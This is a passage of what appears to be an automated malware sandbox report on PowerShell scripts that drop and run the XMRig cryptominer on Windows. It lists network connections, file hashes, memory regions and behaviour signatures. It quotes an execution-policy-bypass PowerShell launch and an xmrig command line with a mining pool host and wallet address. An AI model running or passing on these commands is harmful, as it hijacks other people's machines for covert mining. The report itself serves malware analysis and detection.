| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.253.116.51.in-addr.arpa | udp |
Files
memory/2484-0-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hloxde3f.hkx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2484-10-0x0000022737E60000-0x0000022737E82000-memory.dmp
memory/2484-11-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/2484-12-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/2484-14-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/2484-15-0x0000022738210000-0x0000022738222000-memory.dmp
memory/2484-16-0x00000227381F0000-0x00000227381FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/184-47-0x000002235A0D0000-0x000002235A0F0000-memory.dmp
memory/184-48-0x00000223EC140000-0x00000223EC160000-memory.dmp
memory/184-49-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/2484-50-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/184-53-0x00000223EC580000-0x00000223EC5A0000-memory.dmp
memory/2484-52-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp
memory/184-51-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-54-0x00000223EC7B0000-0x00000223EC7D0000-memory.dmp
memory/2484-55-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/184-56-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-58-0x00000223EC580000-0x00000223EC5A0000-memory.dmp
memory/184-57-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-59-0x00000223EC7B0000-0x00000223EC7D0000-memory.dmp
memory/184-60-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-61-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-62-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-63-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-64-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-65-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-66-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-67-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-68-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-69-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-70-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-71-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-72-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-73-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-74-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-75-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-76-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-77-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-78-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-79-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-80-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-81-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-82-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-83-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-84-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-85-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-86-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-87-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-88-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-89-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-90-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-91-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-92-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-93-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-94-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-95-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-96-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-97-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-98-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-99-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-100-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-101-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-102-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-103-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-104-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-105-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-106-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-107-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-108-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-109-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-110-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-111-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-112-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-113-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-114-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-115-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-116-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-117-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
memory/184-118-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:21
Platform
win11-20240508-en
Max time kernel
1800s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4292 wrote to memory of 3580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4292 wrote to memory of 3580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4292-0-0x00007FFE6C7F3000-0x00007FFE6C7F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfxqswyg.z3p.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4292-6-0x0000012468540000-0x0000012468562000-memory.dmp
memory/4292-10-0x00007FFE6C7F0000-0x00007FFE6D2B2000-memory.dmp
memory/4292-11-0x00007FFE6C7F0000-0x00007FFE6D2B2000-memory.dmp
memory/4292-12-0x00007FFE6C7F0000-0x00007FFE6D2B2000-memory.dmp
memory/4292-14-0x0000012468CB0000-0x0000012468CC2000-memory.dmp
memory/4292-15-0x0000012468570000-0x000001246857A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3580-46-0x0000026E1AA40000-0x0000026E1AA60000-memory.dmp
memory/3580-47-0x0000026E1C340000-0x0000026E1C360000-memory.dmp
memory/3580-48-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-51-0x0000026E1C380000-0x0000026E1C3A0000-memory.dmp
memory/4292-49-0x00007FFE6C7F0000-0x00007FFE6D2B2000-memory.dmp
memory/3580-50-0x0000026E1C360000-0x0000026E1C380000-memory.dmp
memory/4292-53-0x00007FFE6C7F3000-0x00007FFE6C7F5000-memory.dmp
memory/3580-52-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-54-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-55-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-57-0x0000026E1C380000-0x0000026E1C3A0000-memory.dmp
memory/3580-56-0x0000026E1C360000-0x0000026E1C380000-memory.dmp
memory/3580-58-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-59-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-60-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-61-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-62-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-63-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-64-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-65-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-66-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-67-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-68-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-69-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-70-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-71-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-72-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-73-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-74-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-75-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-76-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-77-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-78-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-79-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-80-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-81-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-82-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-83-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-84-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-85-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-86-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-87-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-88-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-89-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-90-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-91-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-92-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-93-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-94-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-95-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-96-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-97-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-98-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-99-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-100-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-101-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-102-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-103-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-104-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-105-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-106-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-107-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-108-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-109-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-110-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-111-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-112-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-113-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-114-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-115-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
memory/3580-116-0x00007FF7A6990000-0x00007FF7A75C3000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win10v2004-20240611-en
Max time kernel
1798s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1504 wrote to memory of 332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1504 wrote to memory of 332 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| GB | 184.28.176.99:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 99.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.239.69.13.in-addr.arpa | udp |
Files
memory/1504-0-0x00007FFDA9783000-0x00007FFDA9785000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2k0pbn0y.nh0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1504-7-0x000001D5ECE00000-0x000001D5ECE22000-memory.dmp
memory/1504-11-0x00007FFDA9780000-0x00007FFDAA241000-memory.dmp
memory/1504-12-0x00007FFDA9780000-0x00007FFDAA241000-memory.dmp
memory/1504-14-0x00007FFDA9780000-0x00007FFDAA241000-memory.dmp
memory/1504-15-0x000001D5ED1E0000-0x000001D5ED1F2000-memory.dmp
memory/1504-16-0x000001D5ECF80000-0x000001D5ECF8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/332-47-0x000002C530150000-0x000002C530170000-memory.dmp
memory/332-48-0x000002C531940000-0x000002C531960000-memory.dmp
memory/332-49-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-50-0x000002C531960000-0x000002C531980000-memory.dmp
memory/332-51-0x000002C531980000-0x000002C5319A0000-memory.dmp
memory/332-52-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/1504-53-0x00007FFDA9783000-0x00007FFDA9785000-memory.dmp
memory/1504-54-0x00007FFDA9780000-0x00007FFDAA241000-memory.dmp
memory/332-55-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/1504-56-0x00007FFDA9780000-0x00007FFDAA241000-memory.dmp
memory/332-59-0x000002C531980000-0x000002C5319A0000-memory.dmp
memory/332-58-0x000002C531960000-0x000002C531980000-memory.dmp
memory/332-57-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-60-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-61-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-62-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-63-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-64-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-65-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-66-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-67-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-68-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-69-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-70-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-71-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-72-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-73-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-74-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-75-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-76-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-77-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-78-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-79-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-80-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-81-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-82-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-83-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-84-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-85-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-86-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-87-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-88-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-89-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-90-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-91-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-92-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-93-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-94-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-95-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-96-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-97-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-98-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-99-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-100-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-101-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-102-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-103-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-104-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-105-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-106-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-107-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-108-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-109-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-110-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-111-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-112-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-113-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-114-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-115-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-116-0x00007FF711A50000-0x00007FF712683000-memory.dmp
memory/332-117-0x00007FF711A50000-0x00007FF712683000-memory.dmp
